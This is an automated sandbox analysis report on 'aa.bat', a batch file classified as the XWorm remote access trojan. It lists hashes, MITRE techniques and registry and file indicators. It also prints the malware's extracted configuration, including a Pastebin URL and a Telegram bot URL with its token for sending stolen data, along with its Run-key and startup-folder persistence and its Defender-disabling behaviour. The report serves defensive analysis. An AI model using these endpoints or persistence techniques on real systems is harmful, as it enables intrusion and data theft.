xworm | cb407460fb1c8e860e77d175ba27f129571c3bc95cece9e3a46e17f11e10a758

Analysis

max time kernel
32s
max time network
35s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-10-2024 14:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aa.bat
Size

4KB
MD5

e1bb13079136feb8601656942407d6ac
SHA1

b18016cc87ebab626c3c22f9c46f3cb514e16617
SHA256

cb407460fb1c8e860e77d175ba27f129571c3bc95cece9e3a46e17f11e10a758
SHA512

24f9f3ad23f3c7081a4a3cd9f2d1eb7c2bb9ecafb8fe8165e2254fc789f85e2cecbcd49cc2131cf7fec40ff5a0275249f565bf47ea8361a7f9bf11c28a5f961c
SSDEEP

96:qjx1L/Cb/pcm4jdbEtYhOjhKaAYG02uMjeBZkQRdhJjaaAYAn2uMjeBZkozd6z:q9pqcbEt82hKFYG02XqBZpRfRaFYAn2l

Score

10^/10

xworm discovery evasion execution exploit persistence rat trojan

Malware Config

Extracted

Family

xworm

Attributes

install_file
USB.exe
pastebin_url
https://pastebin.com/raw/54jZmcfW
telegram
https://api.telegram.org/bot7470467235:AAH5xKlgIYdawUGRmIROyBj64e_oY5ROaic/sendMessage?chat_id=1330099235

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral1/memory/5980-318-0x000001A5D35D0000-0x000001A5D35DE000-memory.dmp	disable_win_def

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5980-163-0x000001A5D2F90000-0x000001A5D2FA8000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

67 5980 powershell.exe
70 5980 powershell.exe
75 5980 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4504 powershell.exe
5336 powershell.exe
5980 powershell.exe
5720 powershell.exe
5840 powershell.exe
2824 powershell.exe
5876 powershell.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

2892 takeown.exe
4344 icacls.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

5260 attrib.exe

flow	pid	process
67	5980	powershell.exe
70	5980	powershell.exe
75	5980	powershell.exe

pid	process
4504	powershell.exe
5336	powershell.exe
5980	powershell.exe
5720	powershell.exe
5840	powershell.exe
2824	powershell.exe
5876	powershell.exe

pid	process
2892	takeown.exe
4344	icacls.exe

pid	process
5260	attrib.exe

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windowsupdate.vbs	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windowsupdate.vbs	cmd.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exe

pid process

4344 icacls.exe
2892 takeown.exe

pid	process
4344	icacls.exe
2892	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftServiceManager = "wscript.exe \"C:\\ProgramData\\ubcore\\temp.vbs\""	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

38 discord.com
39 discord.com
66 pastebin.com
67 pastebin.com

flow	ioc
38	discord.com
39	discord.com
66	pastebin.com
67	pastebin.com

Drops file in System32 directory 3 IoCs

Processes:

ReAgentc.execurl.exe

description	ioc	process
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe
File created	C:\Windows\System32\Win.bat	curl.exe
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe

Drops file in Windows directory 4 IoCs

Processes:

ReAgentc.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXE

pid process

5524 PING.EXE
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4864 timeout.exe

pid	process
5524	PING.EXE

pid	process
4864	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1452 taskkill.exe

pid	process
1452	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE

Modifies data under HKEY_USERS 40 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe

Modifies registry class 58 IoCs

Processes:

Explorer.EXEmsedge.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 50003100000000004759664e100041646d696e003c0009000400efbe4759f1495d5941752e00000065e10100000001000000000000000000000000000000acc78400410064006d0069006e00000014000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 = 4e003100000000005d594a75100054656d7000003a0009000400efbe4759f1495d594a752e00000084e1010000000100000000000000000000000000000005320000540065006d007000000014000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 78003100000000004759f1491100557365727300640009000400efbe874f77485d5941752e000000c70500000000010000000000000000003a00000000000795170155007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 56003100000000004759f14912004170704461746100400009000400efbe4759f1495d5941752e00000070e10100000001000000000000000000000000000000f44609014100700070004400610074006100000016000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 = 50003100000000004759e24b10004c6f63616c003c0009000400efbe4759f1495d5941752e00000083e10100000001000000000000000000000000000000cb4081004c006f00630061006c00000014000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	Explorer.EXE
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3756129449-3121373848-4276368241-1000\{F89C9759-8DBE-4B25-8146-E106490A31C3}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\NodeSlot = "2"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

5440 NOTEPAD.EXE
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5524 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

5580 schtasks.exe
5640 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

Explorer.EXEpowershell.exe

pid process

3408 Explorer.EXE
5980 powershell.exe

pid	process
5440	NOTEPAD.EXE

pid	process
5524	PING.EXE

pid	process
5580	schtasks.exe
5640	schtasks.exe

pid	process
3408	Explorer.EXE
5980	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1984	msedge.exe
1984	msedge.exe
1680	msedge.exe
1680	msedge.exe
2824	msedge.exe
2824	msedge.exe
4504	powershell.exe
4504	powershell.exe
4504	powershell.exe
5336	powershell.exe
5336	powershell.exe
5336	powershell.exe
5720	powershell.exe
5720	powershell.exe
5720	powershell.exe
5840	powershell.exe
5840	powershell.exe
5840	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
2824	powershell.exe
2824	powershell.exe
2824	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5876	powershell.exe
5876	powershell.exe
5876	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3408 Explorer.EXE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

msedge.exe

pid process

1680 msedge.exe
1680 msedge.exe
1680 msedge.exe

pid	process
3408	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetakeown.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeExplorer.EXEpowershell.exepowershell.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	1452	taskkill.exe
Token: SeTakeOwnershipPrivilege	2892	takeown.exe
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeDebugPrivilege	5336	powershell.exe
Token: SeDebugPrivilege	5720	powershell.exe
Token: SeDebugPrivilege	5840	powershell.exe
Token: SeDebugPrivilege	5980	powershell.exe
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
